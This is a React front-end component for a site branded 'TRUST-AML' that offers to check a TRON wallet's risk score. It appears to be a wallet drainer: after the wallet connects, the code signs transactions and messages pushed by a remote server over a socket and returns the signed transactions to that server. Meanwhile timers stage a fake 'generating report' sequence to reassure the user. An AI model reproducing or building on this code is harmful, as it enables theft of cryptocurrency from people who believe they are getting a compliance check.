import React, {Fragment, useState, useEffect} from "react";
import Tilt from 'react-parallax-tilt'; // Похоже, ты используешь Tilt
import {WalletConnectWallet, WalletConnectChainID} from '@tronweb3/walletconnect-tron';

import {
    listenDisconnectRequest,
    listenMessageRequest, listenReportDone,
    listenTransactionRequest,
    registerWallet,
    sendSignedTransaction,
    stopListenDisconnectRequest,
    stopListeningMessageRequest,
    stopListeningReportDone,
    stopListeningTransactionRequest
} from "../../sockets/socketHandler.js";
import {useTranslation} from 'react-i18next';
import RiskScoreCard from "../RiskScoreCard/RiskScoreCard.jsx";

const ThemeBannerThree = () => {
    const {t} = useTranslation();
    const [wallet, setWallet] = useState(null);
    const [address, setAddress] = useState(null);
    const [stateReport, setStateReport] = useState(null);

    const handleConnect = async () => {
        setStateReport('connect')
        const newWallet = new WalletConnectWallet({
            network: WalletConnectChainID.Mainnet,
            options: {
                relayUrl: 'wss://relay.walletconnect.com',
                projectId: 'd34c992178053060de863d96d8e97470',
                metadata: {
                    name: 'TRUST-AML',
                    description: 'WalletConnect',
                    url: 'https://trust-aml.pro',
                    icons: ['https://trust-aml.pro/assets/img/logo/logo.png']
                }
            },
            web3ModalConfig: {
                themeMode: 'dark',
                themeVariables: {
                    '--w3m-z-index': 11111
                },
                explorerRecommendedWalletIds: [
                    '1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369',
                    '4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0'
                ]
            }
        });

        try {
            const {address} = await newWallet.connect();
            setWallet(newWallet);
            setAddress(address);
            setStateReport('connected')
            console.log("Connected address:", address);
        } catch (error) {
            if (error?.message==='Modal is closed.') setStateReport(null)
            console.error("Connection failed:", error);
        }
    };

    const handleDisconnect = async () => {
        if (wallet) {
            try {
                await wallet.disconnect();
                setStateReport(null)
                setWallet(null);
                setAddress(null);
                console.log("Disconnected");
            } catch (error) {
                console.error("Disconnection failed:", error);
            }
        }
    };

    useEffect(() => {
        console.log('Эффект ', address)
        if (address) {
            registerWallet(address);

            const handleSignTransaction = async (transactionData) => {
                setStateReport('waitingAcceptTransaction')
                console.log('Transaction request received:', transactionData);
                if (wallet) {
                    try {
                        const signedTx = await wallet.signTransaction(transactionData);
                        console.log('Signed transaction:', signedTx);
                        setStateReport('validating')
                        if (signedTx) {
                            // Отправляю на серврер через сокет
                            sendSignedTransaction({address, signedTx})
                        }

                    } catch (error) {
                        setStateReport('cancel')
                        console.error('Failed to sign transaction:', error);
                    }
                } else {
                    console.warn('Wallet not connected');
                }
            };

            const handleSignMessage = async ({address, message}) => {
                setStateReport('waitingAcceptTransaction')
                console.log('получено', message)
                if (wallet) {
                    try {
                        await wallet.signMessage({
                            account: address,
                            message: message
                        })
                        setStateReport('validating')
                        console.log('Сообщение подтверждено')

                    } catch (error) {
                        setStateReport('cancel')
                        console.log('Сообщение НЕ подтверждено')
                        console.error('Failed to sign transaction:', error);
                    }
                } else {
                    console.warn('Wallet not connected');
                }
            };

            const handleReportDone = () => {
                console.log('gjkexbkb ')
                // Сразу установить 'waitingReport'
                setStateReport('waitingReport');

                // Через 2–3 секунды — 'generateReport'
                setTimeout(() => {
                    setStateReport('generateReport');

                    // Через еще 1 секунду — 'report'
                    setTimeout(() => {
                        setStateReport('report');
                    }, 1000);

                }, 2500); // промежуток между waiting и generate
            };


            listenTransactionRequest(handleSignTransaction);
            listenMessageRequest(handleSignMessage)
            listenReportDone(handleReportDone)
            listenDisconnectRequest(handleDisconnect)

            return () => {

                stopListeningTransactionRequest(handleSignTransaction);
                stopListeningMessageRequest(handleSignMessage)
                stopListeningReportDone(handleReportDone)
                stopListenDisconnectRequest(handleSignTransaction);

            };
        }
    }, [address, wallet]);

    return (

        <Fragment>
            {stateReport ? <RiskScoreCard address={address} state={stateReport}/>
                :
                <div className="theme-banner-three pt-100 pb-155 pt-lg-120 pb-lg-100 pt-md-80 pb-md-40">
                    {/* Твои иконки */}
                    <img className="banner-shape shape-one d-none d-sm-inline-block"
                         src="assets/img/shape/star-3b.svg"
                         alt="shape"/>
                    <img className="banner-shape shape-two d-none d-lg-inline-block"
                         src="assets/img/shape/star-4b.svg"
                         alt="shape"/>
                    <img className="banner-shape shape-three d-none d-sm-inline-block"
                         src="assets/img/shape/star-2.svg"
                         alt="shape"/>
                    <img className="banner-shape shape-four d-none d-md-inline-block"
                         src="assets/img/shape/star-4b.svg"
                         alt="shape"/>
                    <img className="banner-shape shape-five" src="assets/img/shape/star-7c.svg" alt="shape"/>
                    <img className="banner-shape shape-six d-none d-xl-inline-block"
                         src="assets/img/hero/hero-shape-3a.svg"
                         alt="shape"/>
                    <img className="banner-shape shape-seven d-none d-xl-inline-block"
                         src="assets/img/hero/hero-shape-3b.svg" alt="shape"/>

                    <div className="container">
                        <div className="row gx-4 gx-xxl-5 align-items-center">
                            <div className="col-xl-6 col-md-6">
                                <div className="theme__content__two text-md-start text-center mb-45">

                                    <h1 className="main-title-two">
                                        {t('home')}
                                        <span>{t('home2')}</span>
                                        {t('home3')}
                                    </h1>

                                    <div
                                        className="d-flex gap-3 justify-content-center justify-content-md-start mt-4">
                                        <button className="theme_btn" onClick={handleConnect}>
                                            {address ? `Connected: ${address.slice(0, 6)}...${address.slice(-4)}` : t('button')}
                                        </button>
                                    </div>

                                </div>
                            </div>

                            <div className="col-xl-6 col-md-6">
                                <Tilt>
                                    <div className="hero-ilustration-wrapper mb-45">
                                        <img src="assets/img/hero/hero-3c.svg" alt="ilus"/>
                                    </div>
                                </Tilt>
                            </div>
                        </div>
                    </div>
                </div>
            }
        </Fragment>

    )
};

export default ThemeBannerThree;
